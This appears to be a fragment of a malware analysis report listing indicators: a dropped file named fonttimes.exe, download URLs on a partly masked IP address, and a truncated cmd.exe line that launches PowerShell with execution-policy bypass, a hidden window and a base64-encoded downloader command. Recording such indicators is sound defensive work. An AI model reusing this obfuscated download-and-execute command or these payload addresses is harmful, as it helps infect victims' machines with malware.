Technical Information
- '%TEMP%\fonttimes.exe'
- http://31.##.186.152/qyfo/kngbxujwl9.exe
- %TEMP%\fonttimes.exe
- http://31.##.186.152/qyfo/Kngbxujwl9.exe
- '<SYSTEM32>\cmd.exe' /c Start poweRSHELl.EXE -ex bYpaSs -NoP -W 1 -EC IAAgACAAUwBFAHQALQBjAE8AbgBUAEUATgB0ACAAIAAgAC0AdgBBAAkACQAgACgACQAgACAALgAoACcATgBlAFcALQBvAGIAagBlAEMAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA...